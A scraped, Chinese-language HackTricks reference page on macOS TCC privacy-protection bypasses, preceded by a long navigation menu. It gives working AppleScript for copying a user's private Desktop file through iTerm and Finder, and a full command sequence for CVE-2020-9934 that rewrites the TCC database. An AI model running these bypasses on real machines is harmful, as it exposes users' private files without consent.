hacktricks
  • 👾Welcome!
    • HackTricks
  • 🤩Generic Methodologies & Resources
    • Pentesting Methodology
    • External Recon Methodology
      • Wide Source Code Search
      • Github Dorks & Leaks
    • Pentesting Network
      • DHCPv6
      • EIGRP Attacks
      • GLBP & HSRP Attacks
      • IDS and IPS Evasion
      • Lateral VLAN Segmentation Bypass
      • Network Protocols Explained (ESP)
      • Nmap Summary (ESP)
      • Pentesting IPv6
      • Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
      • Spoofing SSDP and UPnP Devices with EvilSSDP
    • Pentesting Wifi
      • Evil Twin EAP-TLS
    • Phishing Methodology
      • Clone a Website
      • Detecting Phishing
      • Phishing Files & Documents
    • Basic Forensic Methodology
      • Baseline Monitoring
      • Anti-Forensic Techniques
      • Docker Forensics
      • Image Acquisition & Mount
      • Linux Forensics
      • Malware Analysis
      • Memory dump analysis
        • Volatility - CheatSheet
      • Partitions/File Systems/Carving
        • File/Data Carving & Recovery Tools
      • Pcap Inspection
        • DNSCat pcap analysis
        • Suricata & Iptables cheatsheet
        • USB Keystrokes
        • Wifi Pcap Analysis
        • Wireshark tricks
      • Specific Software/File-Type Tricks
        • Decompile compiled python binaries (exe, elf) - Retreive from .pyc
        • Browser Artifacts
        • Deofuscation vbs (cscript.exe)
        • Local Cloud Storage
        • Office file analysis
        • PDF File analysis
        • PNG tricks
        • Video and Audio file analysis
        • ZIPs tricks
      • Windows Artifacts
        • Interesting Windows Registry Keys
    • Brute Force - CheatSheet
    • Python Sandbox Escape & Pyscript
      • Bypass Python sandboxes
        • LOAD_NAME / LOAD_CONST opcode OOB Read
      • Class Pollution (Python's Prototype Pollution)
      • Python Internal Read Gadgets
      • Pyscript
      • venv
      • Web Requests
      • Bruteforce hash (few chars)
      • Basic Python
    • Exfiltration
    • Tunneling and Port Forwarding
    • Threat Modeling
    • Search Exploits
    • Shells (Linux, Windows, MSFVenom)
      • MSFVenom - CheatSheet
      • Shells - Windows
      • Shells - Linux
      • Full TTYs
  • 🐧Linux Hardening
    • Checklist - Linux Privilege Escalation
    • Linux Privilege Escalation
      • Arbitrary File Write to Root
      • Cisco - vmanage
      • Containerd (ctr) Privilege Escalation
      • D-Bus Enumeration & Command Injection Privilege Escalation
      • Docker Security
        • Abusing Docker Socket for Privilege Escalation
        • AppArmor
        • AuthZ& AuthN - Docker Access Authorization Plugin
        • CGroups
        • Docker --privileged
        • Docker Breakout / Privilege Escalation
          • release_agent exploit - Relative Paths to PIDs
          • Docker release_agent cgroups escape
          • Sensitive Mounts
        • Namespaces
          • CGroup Namespace
          • IPC Namespace
          • PID Namespace
          • Mount Namespace
          • Network Namespace
          • Time Namespace
          • User Namespace
          • UTS Namespace
        • Seccomp
        • Weaponizing Distroless
      • Escaping from Jails
      • euid, ruid, suid
      • Interesting Groups - Linux Privesc
        • lxd/lxc Group - Privilege escalation
      • Logstash
      • ld.so privesc exploit example
      • Linux Active Directory
      • Linux Capabilities
      • NFS no_root_squash/no_all_squash misconfiguration PE
      • Node inspector/CEF debug abuse
      • Payloads to execute
      • RunC Privilege Escalation
      • SELinux
      • Socket Command Injection
      • Splunk LPE and Persistence
      • SSH Forward Agent exploitation
      • Wildcards Spare tricks
    • Useful Linux Commands
    • Bypass Linux Restrictions
      • Bypass FS protections: read-only / no-exec / Distroless
        • DDexec / EverythingExec
    • Linux Environment Variables
    • Linux Post-Exploitation
      • PAM - Pluggable Authentication Modules
    • FreeIPA Pentesting
  • 🍏MacOS Hardening
    • macOS Security & Privilege Escalation
      • macOS Apps - Inspecting, debugging and Fuzzing
        • Introduction to x64
        • Introduction to ARM64v8
      • macOS AppleFS
      • macOS Bypassing Firewalls
      • macOS Defensive Apps
      • macOS GCD - Grand Central Dispatch
      • macOS Kernel & System Extensions
        • macOS IOKit
        • macOS Kernel Extensions
        • macOS Kernel Vulnerabilities
        • macOS System Extensions
      • macOS Network Services & Protocols
      • macOS File Extension & URL scheme app handlers
      • macOS Files, Folders, Binaries & Memory
        • macOS Bundles
        • macOS Installers Abuse
        • macOS Memory Dumping
        • macOS Sensitive Locations & Interesting Daemons
        • macOS Universal binaries & Mach-O Format
      • macOS Objective-C
      • macOS Privilege Escalation
      • macOS Process Abuse
        • macOS Dirty NIB
        • macOS Chromium Injection
        • macOS Electron Applications Injection
        • macOS Function Hooking
        • macOS IPC - Inter Process Communication
          • macOS MIG - Mach Interface Generator
          • macOS XPC
            • macOS XPC Authorization
            • macOS XPC Connecting Process Check
              • macOS PID Reuse
              • macOS xpc_connection_get_audit_token Attack
          • macOS Thread Injection via Task port
        • macOS Java Applications Injection
        • macOS Library Injection
          • macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES
          • macOS Dyld Process
        • macOS Perl Applications Injection
        • macOS Python Applications Injection
        • macOS Ruby Applications Injection
        • macOS .Net Applications Injection
      • macOS Security Protections
        • macOS Gatekeeper / Quarantine / XProtect
        • macOS Launch/Environment Constraints & Trust Cache
        • macOS Sandbox
          • macOS Default Sandbox Debug
          • macOS Sandbox Debug & Bypass
            • macOS Office Sandbox Bypasses
        • macOS SIP
        • macOS TCC
          • macOS Apple Events
          • macOS TCC Bypasses
            • macOS Apple Scripts
          • macOS TCC Payloads
        • macOS Dangerous Entitlements & TCC perms
        • macOS FS Tricks
          • macOS xattr-acls extra stuff
      • macOS Users
    • macOS Red Teaming
      • macOS MDM
        • Enrolling Devices in Other Organisations
        • macOS Serial Number
      • macOS Keychain
    • macOS Useful Commands
    • macOS Auto Start
  • 🪟Windows Hardening
    • Checklist - Local Windows Privilege Escalation
    • Windows Local Privilege Escalation
      • Abusing Tokens
      • Access Tokens
      • ACLs - DACLs/SACLs/ACEs
      • AppendData/AddSubdirectory permission over service registry
      • Create MSI with WIX
      • COM Hijacking
      • Dll Hijacking
        • Writable Sys Path +Dll Hijacking Privesc
      • DPAPI - Extracting Passwords
      • From High Integrity to SYSTEM with Name Pipes
      • Integrity Levels
      • JuicyPotato
      • Leaked Handle Exploitation
      • MSI Wrapper
      • Named Pipe Client Impersonation
      • Privilege Escalation with Autoruns
      • RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
      • SeDebug + SeImpersonate copy token
      • SeImpersonate from High To System
      • Windows C Payloads
    • Active Directory Methodology
      • Abusing Active Directory ACLs/ACEs
        • Shadow Credentials
      • AD Certificates
        • AD CS Account Persistence
        • AD CS Domain Escalation
        • AD CS Domain Persistence
        • AD CS Certificate Theft
      • AD information in printers
      • AD DNS Records
      • ASREPRoast
      • BloodHound & Other AD Enum Tools
      • Constrained Delegation
      • Custom SSP
      • DCShadow
      • DCSync
      • Diamond Ticket
      • DSRM Credentials
      • External Forest Domain - OneWay (Inbound) or bidirectional
      • External Forest Domain - One-Way (Outbound)
      • Golden Ticket
      • Kerberoast
      • Kerberos Authentication
      • Kerberos Double Hop Problem
      • LAPS
      • MSSQL AD Abuse
      • Over Pass the Hash/Pass the Key
      • Pass the Ticket
      • Password Spraying / Brute Force
      • PrintNightmare
      • Force NTLM Privileged Authentication
      • Privileged Groups
      • RDP Sessions Abuse
      • Resource-based Constrained Delegation
      • Security Descriptors
      • SID-History Injection
      • Silver Ticket
      • Skeleton Key
      • Unconstrained Delegation
    • Windows Security Controls
      • UAC - User Account Control
    • NTLM
      • Places to steal NTLM creds
    • Lateral Movement
      • AtExec / SchtasksExec
      • DCOM Exec
      • PsExec/Winexec/ScExec
      • SmbExec/ScExec
      • WinRM
      • WmicExec
    • Pivoting to the Cloud
    • Stealing Windows Credentials
      • Windows Credentials Protections
      • Mimikatz
      • WTS Impersonator
    • Basic Win CMD for Pentesters
    • Basic PowerShell for Pentesters
      • PowerView/SharpView
    • Antivirus (AV) Bypass
  • 📱Mobile Pentesting
    • Android APK Checklist
    • Android Applications Pentesting
      • Android Applications Basics
      • Android Task Hijacking
      • ADB Commands
      • APK decompilers
      • AVD - Android Virtual Device
      • Bypass Biometric Authentication (Android)
      • content:// protocol
      • Drozer Tutorial
        • Exploiting Content Providers
      • Exploiting a debuggeable application
      • Frida Tutorial
        • Frida Tutorial 1
        • Frida Tutorial 2
        • Frida Tutorial 3
        • Objection Tutorial
      • Google CTF 2018 - Shall We Play a Game?
      • Install Burp Certificate
      • Intent Injection
      • Make APK Accept CA Certificate
      • Manual DeObfuscation
      • React Native Application
      • Reversing Native Libraries
      • Smali - Decompiling/[Modifying]/Compiling
      • Spoofing your location in Play Store
      • Tapjacking
      • Webview Attacks
    • iOS Pentesting Checklist
    • iOS Pentesting
      • iOS App Extensions
      • iOS Basics
      • iOS Basic Testing Operations
      • iOS Burp Suite Configuration
      • iOS Custom URI Handlers / Deeplinks / Custom Schemes
      • iOS Extracting Entitlements From Compiled Application
      • iOS Frida Configuration
      • iOS Hooking With Objection
      • iOS Protocol Handlers
      • iOS Serialisation and Encoding
      • iOS Testing Environment
      • iOS UIActivity Sharing
      • iOS Universal Links
      • iOS UIPasteboard
      • iOS WebViews
    • Cordova Apps
    • Xamarin Apps
  • 👽Network Services Pentesting
    • Pentesting JDWP - Java Debug Wire Protocol
    • Pentesting Printers
    • Pentesting SAP
    • Pentesting VoIP
      • Basic VoIP Protocols
        • SIP (Session Initiation Protocol)
    • Pentesting Remote GdbServer
    • 7/tcp/udp - Pentesting Echo
    • 21 - Pentesting FTP
      • FTP Bounce attack - Scan
      • FTP Bounce - Download 2ºFTP file
    • 22 - Pentesting SSH/SFTP
    • 23 - Pentesting Telnet
    • 25,465,587 - Pentesting SMTP/s
      • SMTP Smuggling
      • SMTP - Commands
    • 43 - Pentesting WHOIS
    • 49 - Pentesting TACACS+
    • 53 - Pentesting DNS
    • 69/UDP TFTP/Bittorrent-tracker
    • 79 - Pentesting Finger
    • 80,443 - Pentesting Web Methodology
      • 403 & 401 Bypasses
      • AEM - Adobe Experience Cloud
      • Angular
      • Apache
      • Artifactory Hacking guide
      • Bolt CMS
      • Buckets
        • Firebase Database
      • CGI
      • DotNetNuke (DNN)
      • Drupal
      • Electron Desktop Apps
        • Electron contextIsolation RCE via preload code
        • Electron contextIsolation RCE via Electron internal code
        • Electron contextIsolation RCE via IPC
      • Flask
      • NodeJS Express
      • Git
      • Golang
      • GWT - Google Web Toolkit
      • Grafana
      • GraphQL
      • H2 - Java SQL database
      • IIS - Internet Information Services
      • ImageMagick Security
      • JBOSS
      • JIRA
      • Joomla
      • JSP
      • Laravel
      • Moodle
      • Nginx
      • PHP Tricks
        • PHP - Useful Functions & disable_functions/open_basedir bypass
          • disable_functions bypass - php-fpm/FastCGI
          • disable_functions bypass - dl function
          • disable_functions bypass - PHP 7.0-7.4 (*nix only)
          • disable_functions bypass - Imagick <= 3.3.0 PHP >= 5.4 Exploit
          • disable_functions - PHP 5.x Shellshock Exploit
          • disable_functions - PHP 5.2.4 ionCube extension Exploit
          • disable_functions bypass - PHP <= 5.2.9 on windows
          • disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL
          • disable_functions bypass - PHP safe_mode bypass via proc_open() and custom environment Exploit
          • disable_functions bypass - PHP Perl Extension Safe_mode Bypass Exploit
          • disable_functions bypass - PHP 5.2.3 - Win32std ext Protections Bypass
          • disable_functions bypass - PHP 5.2 - FOpen Exploit
          • disable_functions bypass - via mem
          • disable_functions bypass - mod_cgi
          • disable_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl_exec
        • PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])
        • PHP SSRF
      • Python
      • Rocket Chat
      • Special HTTP headers
      • Source code Review / SAST Tools
      • Spring Actuators
      • Symfony
      • Tomcat
        • Basic Tomcat Info
      • Uncovering CloudFlare
      • VMWare (ESX, VCenter...)
      • WAF Bypass
      • Web API Pentesting
      • WebDav
      • Werkzeug / Flask Debug
      • Wordpress
    • 88tcp/udp - Pentesting Kerberos
      • Harvesting tickets from Windows
      • Harvesting tickets from Linux
    • 110,995 - Pentesting POP
    • 111/TCP/UDP - Pentesting Portmapper
    • 113 - Pentesting Ident
    • 123/udp - Pentesting NTP
    • 135, 593 - Pentesting MSRPC
    • 137,138,139 - Pentesting NetBios
    • 139,445 - Pentesting SMB
      • rpcclient enumeration
    • 143,993 - Pentesting IMAP
    • 161,162,10161,10162/udp - Pentesting SNMP
      • Cisco SNMP
      • SNMP RCE
    • 194,6667,6660-7000 - Pentesting IRC
    • 264 - Pentesting Check Point FireWall-1
    • 389, 636, 3268, 3269 - Pentesting LDAP
    • 500/udp - Pentesting IPsec/IKE VPN
    • 502 - Pentesting Modbus
    • 512 - Pentesting Rexec
    • 513 - Pentesting Rlogin
    • 514 - Pentesting Rsh
    • 515 - Pentesting Line Printer Daemon (LPD)
    • 548 - Pentesting Apple Filing Protocol (AFP)
    • 554,8554 - Pentesting RTSP
    • 623/UDP/TCP - IPMI
    • 631 - Internet Printing Protocol(IPP)
    • 700 - Pentesting EPP
    • 873 - Pentesting Rsync
    • 1026 - Pentesting Rusersd
    • 1080 - Pentesting Socks
    • 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
    • 1414 - Pentesting IBM MQ
    • 1433 - Pentesting MSSQL - Microsoft SQL Server
      • Types of MSSQL Users
    • 1521,1522-1529 - Pentesting Oracle TNS Listener
    • 1723 - Pentesting PPTP
    • 1883 - Pentesting MQTT (Mosquitto)
    • 2049 - Pentesting NFS Service
    • 2301,2381 - Pentesting Compaq/HP Insight Manager
    • 2375, 2376 Pentesting Docker
    • 3128 - Pentesting Squid
    • 3260 - Pentesting ISCSI
    • 3299 - Pentesting SAPRouter
    • 3306 - Pentesting Mysql
    • 3389 - Pentesting RDP
    • 3632 - Pentesting distcc
    • 3690 - Pentesting Subversion (svn server)
    • 3702/UDP - Pentesting WS-Discovery
    • 4369 - Pentesting Erlang Port Mapper Daemon (epmd)
    • 4786 - Cisco Smart Install
    • 4840 - OPC Unified Architecture
    • 5000 - Pentesting Docker Registry
    • 5353/UDP Multicast DNS (mDNS) and DNS-SD
    • 5432,5433 - Pentesting Postgresql
    • 5439 - Pentesting Redshift
    • 5555 - Android Debug Bridge
    • 5601 - Pentesting Kibana
    • 5671,5672 - Pentesting AMQP
    • 5800,5801,5900,5901 - Pentesting VNC
    • 5984,6984 - Pentesting CouchDB
    • 5985,5986 - Pentesting WinRM
    • 5985,5986 - Pentesting OMI
    • 6000 - Pentesting X11
    • 6379 - Pentesting Redis
    • 8009 - Pentesting Apache JServ Protocol (AJP)
    • 8086 - Pentesting InfluxDB
    • 8089 - Pentesting Splunkd
    • 8333,18333,38333,18444 - Pentesting Bitcoin
    • 9000 - Pentesting FastCGI
    • 9001 - Pentesting HSQLDB
    • 9042/9160 - Pentesting Cassandra
    • 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream)
    • 9200 - Pentesting Elasticsearch
    • 10000 - Pentesting Network Data Management Protocol (ndmp)
    • 11211 - Pentesting Memcache
      • Memcache Commands
    • 15672 - Pentesting RabbitMQ Management
    • 24007,24008,24009,49152 - Pentesting GlusterFS
    • 27017,27018 - Pentesting MongoDB
    • 44134 - Pentesting Tiller (Helm)
    • 44818/UDP/TCP - Pentesting EthernetIP
    • 47808/udp - Pentesting BACNet
    • 50030,50060,50070,50075,50090 - Pentesting Hadoop
  • 🕸️Pentesting Web
    • Web Vulnerabilities Methodology
    • Reflecting Techniques - PoCs and Polygloths CheatSheet
      • Web Vulns List
    • 2FA/OTP Bypass
    • Account Takeover
    • Browser Extension Pentesting Methodology
      • BrowExt - ClickJacking
      • BrowExt - permissions & host_permissions
      • BrowExt - XSS Example
    • Bypass Payment Process
    • Captcha Bypass
    • Cache Poisoning and Cache Deception
      • Cache Poisoning to DoS
    • Clickjacking
    • Client Side Template Injection (CSTI)
    • Client Side Path Traversal
    • Command Injection
    • Content Security Policy (CSP) Bypass
      • CSP bypass: self + 'unsafe-inline' with Iframes
    • Cookies Hacking
      • Cookie Tossing
      • Cookie Jar Overflow
      • Cookie Bomb
    • CORS - Misconfigurations & Bypass
    • CRLF (%0D%0A) Injection
    • CSRF (Cross Site Request Forgery)
    • Dangling Markup - HTML scriptless injection
      • SS-Leaks
    • Dependency Confusion
    • Deserialization
      • NodeJS - __proto__ & prototype Pollution
        • Client Side Prototype Pollution
        • Express Prototype Pollution Gadgets
        • Prototype Pollution to RCE
      • Java JSF ViewState (.faces) Deserialization
      • Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
      • Basic Java Deserialization (ObjectInputStream, readObject)
      • PHP - Deserialization + Autoload Classes
      • CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
      • Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
      • Exploiting __VIEWSTATE knowing the secrets
      • Exploiting __VIEWSTATE without knowing the secrets
      • Python Yaml Deserialization
      • JNDI - Java Naming and Directory Interface & Log4Shell
    • Domain/Subdomain takeover
    • Email Injections
    • File Inclusion/Path traversal
      • phar:// deserialization
      • LFI2RCE via PHP Filters
      • LFI2RCE via Nginx temp files
      • LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS
      • LFI2RCE via Segmentation Fault
      • LFI2RCE via phpinfo()
      • LFI2RCE Via temp file uploads
      • LFI2RCE via Eternal waiting
      • LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure
    • File Upload
      • PDF Upload - XXE and CORS bypass
    • Formula/CSV/Doc/LaTeX/GhostScript Injection
    • gRPC-Web Pentest
    • HTTP Connection Contamination
    • HTTP Connection Request Smuggling
    • HTTP Request Smuggling / HTTP Desync Attack
      • Browser HTTP Request Smuggling
      • Request Smuggling in HTTP/2 Downgrades
    • HTTP Response Smuggling / Desync
    • Upgrade Header Smuggling
    • hop-by-hop headers
    • IDOR
    • Integer Overflow
    • JWT Vulnerabilities (Json Web Tokens)
    • LDAP Injection
    • Login Bypass
      • Login bypass List
    • NoSQL injection
    • OAuth to Account takeover
    • Open Redirect
    • Parameter Pollution
    • Phone Number Injections
    • PostMessage Vulnerabilities
      • Blocking main page to steal postmessage
      • Bypassing SOP with Iframes - 1
      • Bypassing SOP with Iframes - 2
      • Steal postmessage modifying iframe location
    • Proxy / WAF Protections Bypass
    • Race Condition
    • Rate Limit Bypass
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Attacks
      • SAML Basics
    • Server Side Inclusion/Edge Side Inclusion Injection
    • SQL Injection
      • MS Access SQL Injection
      • MSSQL Injection
      • MySQL injection
        • MySQL File priv to SSRF/RCE
      • Oracle injection
      • Cypher Injection (neo4j)
      • PostgreSQL injection
        • dblink/lo_import data exfiltration
        • PL/pgSQL Password Bruteforce
        • Network - Privesc, Port Scanner and NTLM chanllenge response disclosure
        • Big Binary Files Upload (PostgreSQL)
        • RCE with PostgreSQL Languages
        • RCE with PostgreSQL Extensions
      • SQLMap - Cheetsheat
        • Second Order Injection - SQLMap
    • SSRF (Server Side Request Forgery)
      • URL Format Bypass
      • SSRF Vulnerable Platforms
      • Cloud SSRF
    • SSTI (Server Side Template Injection)
      • EL - Expression Language
      • Jinja2 SSTI
    • Reverse Tab Nabbing
    • Unicode Injection
      • Unicode Normalization
    • WebSocket Attacks
    • Web Tool - WFuzz
    • XPATH injection
    • XSLT Server Side Injection (Extensible Stylesheet Language Transformations)
    • XXE - XEE - XML External Entity
    • XSS (Cross Site Scripting)
      • Abusing Service Workers
      • Chrome Cache to XSS
      • Debugging Client Side JS
      • Dom Clobbering
      • DOM Invader
      • DOM XSS
      • Iframes in XSS, CSP and SOP
      • JS Hoisting
      • Misc JS Tricks & Relevant Info
      • PDF Injection
      • Server Side XSS (Dynamic PDF)
      • Shadow DOM
      • SOME - Same Origin Method Execution
      • Sniff Leak
      • Steal Info JS
      • XSS in Markdown
    • XSSI (Cross-Site Script Inclusion)
    • XS-Search/XS-Leaks
      • Connection Pool Examples
      • Connection Pool by Destination Example
      • Cookie Bomb + Onerror XS Leak
      • URL Max Length - Client Side
      • performance.now example
      • performance.now + Force heavy task
      • Event Loop Blocking + Lazy images
      • JavaScript Execution XS Leak
      • CSS Injection
        • CSS Injection Code
  • ⛈️Cloud Security
    • Pentesting Kubernetes
    • Pentesting Cloud (AWS, GCP, Az...)
    • Pentesting CI/CD (Github, Jenkins, Terraform...)
  • 😎Hardware/Physical Access
    • Physical Attacks
    • Escaping from KIOSKs
    • Firmware Analysis
      • Bootloader testing
      • Firmware Integrity
  • 🎯Binary Exploitation
    • Basic Binary Exploitation Methodology
      • ELF Basic Information
      • Exploiting Tools
        • PwnTools
    • Stack Overflow
      • Pointer Redirecting
      • Ret2win
        • Ret2win - arm64
      • Stack Shellcode
        • Stack Shellcode - arm64
      • Stack Pivoting - EBP2Ret - EBP chaining
      • Uninitialized Variables
    • ROP - Return Oriented Programing
      • BROP - Blind Return Oriented Programming
      • Ret2csu
      • Ret2dlresolve
      • Ret2esp / Ret2reg
      • Ret2lib
        • Leaking libc address with ROP
          • Leaking libc - template
        • One Gadget
        • Ret2lib + Printf leak - arm64
      • Ret2syscall
        • Ret2syscall - ARM64
      • Ret2vDSO
      • SROP - Sigreturn-Oriented Programming
        • SROP - ARM64
    • Array Indexing
    • Integer Overflow
    • Format Strings
      • Format Strings - Arbitrary Read Example
      • Format Strings Template
    • Heap
      • Use After Free
      • Heap Overflow
    • Common Binary Exploitation Protections & Bypasses
      • ASLR
        • Ret2plt
        • Ret2ret & Reo2pop
      • CET & Shadow Stack
      • Libc Protections
      • Memory Tagging Extension (MTE)
      • No-exec / NX
      • PIE
        • BF Addresses in the Stack
      • Relro
      • Stack Canaries
        • BF Forked & Threaded Stack Canaries
        • Print Stack Canary
    • Write What Where 2 Exec
      • WWW2Exec - atexit()
      • WWW2Exec - .dtors & .fini_array
      • WWW2Exec - GOT/PLT
      • WWW2Exec - __malloc_hook
    • Common Exploiting Problems
    • Windows Exploiting (Basic Guide - OSCP lvl)
    • Linux Exploiting (Basic) (SPA)
  • 🔩Reversing
    • Reversing Tools & Basic Methods
      • Angr
        • Angr - Examples
      • Z3 - Satisfiability Modulo Theories (SMT)
      • Cheat Engine
      • Blobrunner
    • Common API used in Malware
    • Word Macros
  • 🔮Crypto & Stego
    • Cryptographic/Compression Algorithms
      • Unpacking binaries
    • Certificates
    • Cipher Block Chaining CBC-MAC
    • Crypto CTFs Tricks
    • Electronic Code Book (ECB)
    • Hash Length Extension Attack
    • Padding Oracle
    • RC4 - Encrypt&Decrypt
    • Stego Tricks
    • Esoteric languages
    • Blockchain & Crypto Currencies
  • 🦂C2
    • Salseo
    • ICMPsh
    • Cobalt Strike
  • ✍️TODO
    • Other Big References
    • Rust Basics
    • More Tools
    • MISC
    • Pentesting DNS
    • Hardware Hacking
      • I2C
      • UART
      • Radio
      • JTAG
      • SPI
    • Radio Hacking
      • Pentesting RFID
      • Infrared
      • Sub-GHz RF
      • iButton
      • Flipper Zero
        • FZ - NFC
        • FZ - Sub-GHz
        • FZ - Infrared
        • FZ - iButton
        • FZ - 125kHz RFID
      • Proxmark 3
      • FISSURE - The RF Framework
      • Low-Power Wide Area Network
      • Pentesting BLE - Bluetooth Low Energy
    • Industrial Control Systems Hacking
    • Burp Suite
    • Other Web Tricks
    • Interesting HTTP
    • Emails Vulnerabilities
    • Android Forensics
    • TR-069
    • 6881/udp - Pentesting BitTorrent
    • Online Platforms with API
    • Stealing Sensitive Information Disclosure from a Web
    • Post Exploitation
    • Cookies Policy
由 GitBook 提供支持
在本页
  • 按功能分类
  • 写入绕过
  • TCC 点击劫持
  • 通过任意名称请求 TCC
  • SSH 绕过
  • 处理扩展名 - CVE-2022-26767
  • iCloud
  • kTCCServiceAppleEvents / 自动化
  • 通过应用程序行为
  • CVE-2020–9934 - TCC
  • CVE-2021-30761 - Notes
  • CVE-2021-30782 - Translocation
  • CVE-2023-38571 - 音乐和电视
  • SQLITE_SQLLOG_DIR - CVE-2023-32422
  • SQLITE_AUTO_TRACE
  • MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407
  • Apple Remote Desktop
  • 通过NFSHomeDirectory
  • CVE-2020–9934 - TCC
  • CVE-2020-27937 - Directory Utility
  • CVE-2021-30970 - Powerdir
  • 通过进程注入
  • CVE-2020-27937 - Directory Utility
  • CVE-2020-29621 - Coreaudiod
  • 设备抽象层(DAL)插件
  • Firefox
  • CVE-2020-10006
  • CVE-2023-26818 - 电报
  • 通过打开调用
  • 终端脚本
  • 通过挂载
  • CVE-2020-9771 - mount_apfs TCC绕过和提权
  • CVE-2021-1784 & CVE-2021-30808 - 在TCC文件上挂载
  • asr
  • 位置服务
  • 通过启动应用程序
  • 通过grep
  • 合成点击
  • 参考
  1. MacOS Hardening
  2. macOS Security & Privilege Escalation
  3. macOS Security Protections
  4. macOS TCC

macOS TCC Bypasses

上一页macOS Apple Events下一页macOS Apple Scripts

最后更新于1年前

从零开始学习AWS黑客技术,成为专家 !

支持HackTricks的其他方式:

  • 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看!

  • 获取

  • 发现,我们的独家

  • 加入 💬 或 或 关注我们的Twitter 🐦 。

  • 通过向和 github仓库提交PR来分享您的黑客技巧。

按功能分类

写入绕过

这不是绕过,这只是TCC的工作原理:它不会阻止写入。如果终端无法访问用户的桌面以读取内容,它仍然可以写入其中:

username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
username@hostname ~ % echo asd > Desktop/lalala
username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
username@hostname ~ % cat Desktop/lalala
asd

扩展属性 com.apple.macl 被添加到新的 文件 中,以便让 创建者的应用 能够读取它。

TCC 点击劫持

可以将一个窗口覆盖在 TCC 提示框上,使用户在不知情的情况下接受它。您可以在 ** 中找到 PoC**。

通过任意名称请求 TCC

攻击者可以在 Info.plist 中创建任何名称的应用程序(例如 Finder、Google Chrome...),并让其请求访问某些受 TCC 保护的位置。用户会认为是合法应用程序在请求此访问权限。 此外,可以从 Dock 中移除合法应用程序并将伪造的应用程序放置其中,因此当用户点击伪造的应用程序(可以使用相同的图标)时,它可能调用合法应用程序,请求 TCC 权限并执行恶意软件,使用户相信是合法应用程序请求了访问权限。

更多信息和 PoC 请参阅:

SSH 绕过

默认情况下,通过 SSH 访问 具有 "完全磁盘访问权限"。为了禁用此功能,您需要将其列出但禁用(从列表中删除它不会删除这些权限):

在这里,您可以找到一些恶意软件如何绕过此保护的示例:

请注意,现在为了能够启用 SSH,您需要完全磁盘访问权限

处理扩展名 - CVE-2022-26767

属性 com.apple.macl 被赋予文件以授予某个应用程序读取权限。当拖放文件到应用程序上或用户双击文件以使用默认应用程序打开文件时,将设置此属性。

因此,用户可以注册一个恶意应用程序来处理所有扩展名,并调用启动服务来打开任何文件(因此恶意文件将被授予读取权限)。

iCloud

授权 com.apple.private.icloud-account-access 可以与 com.apple.iCloudHelper XPC 服务通信,后者将提供 iCloud 令牌。

iMovie 和 Garageband 具有此授权以及其他授权。

kTCCServiceAppleEvents / 自动化

具有 kTCCServiceAppleEvents 权限的应用程序将能够控制其他应用程序。这意味着它可能能够滥用授予其他应用程序的权限。

有关 Apple 脚本的更多信息,请查看:

例如,如果一个应用程序具有对 iTerm 的自动化权限,例如在此示例中**Terminal** 具有对 iTerm 的访问权限:

在 iTerm 上

没有 FDA 的 Terminal 可以调用具有 FDA 的 iTerm,并使用它执行操作:

iterm.script
tell application "iTerm"
activate
tell current window
create tab with default profile
end tell
tell current session of current window
write text "cp ~/Desktop/private.txt /tmp"
end tell
end tell
osascript iterm.script

通过Finder

或者,如果一个应用程序可以通过Finder访问,它可以执行类似这样的脚本:

set a_user to do shell script "logname"
tell application "Finder"
set desc to path to home folder
set copyFile to duplicate (item "private.txt" of folder "Desktop" of folder a_user of item "Users" of disk of home) to folder desc with replacing
set t to paragraphs of (do shell script "cat " & POSIX path of (copyFile as alias)) as text
end tell
do shell script "rm " & POSIX path of (copyFile as alias)

通过应用程序行为

CVE-2020–9934 - TCC

用户空间的 tccd 守护程序 使用 HOME env 变量来访问 TCC 用户数据库:$HOME/Library/Application Support/com.apple.TCC/TCC.db

# reset database just in case (no cheating!)
$> tccutil reset All
# mimic TCC's directory structure from ~/Library
$> mkdir -p "/tmp/tccbypass/Library/Application Support/com.apple.TCC"
# cd into the new directory
$> cd "/tmp/tccbypass/Library/Application Support/com.apple.TCC/"
# set launchd $HOME to this temporary directory
$> launchctl setenv HOME /tmp/tccbypass
# restart the TCC daemon
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd
# print out contents of TCC database and then give Terminal access to Documents
$> sqlite3 TCC.db .dump
$> sqlite3 TCC.db "INSERT INTO access
VALUES('kTCCServiceSystemPolicyDocumentsFolder',
'com.apple.Terminal', 0, 1, 1,
X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',
NULL,
NULL,
'UNUSED',
NULL,
NULL,
1333333333333337);"
# list Documents directory without prompting the end user
$> ls ~/Documents

CVE-2021-30761 - Notes

Notes可以访问TCC受保护的位置,但是当创建一个笔记时,它会创建在一个非受保护的位置。因此,您可以要求Notes将受保护的文件复制到一个笔记中(因此在非受保护的位置),然后访问该文件:

CVE-2021-30782 - Translocation

二进制文件/usr/libexec/lsd与库libsecurity_translocate具有授权com.apple.private.nullfs_allow,允许其创建nullfs挂载,并具有授权com.apple.private.tcc.allow与**kTCCServiceSystemPolicyAllFiles**以访问每个文件。

可以向“Library”添加隔离属性,调用**com.apple.security.translocation** XPC服务,然后将Library映射到**$TMPDIR/AppTranslocation/d/d/Library,其中Library中的所有文档都可以访问**。

CVE-2023-38571 - 音乐和电视

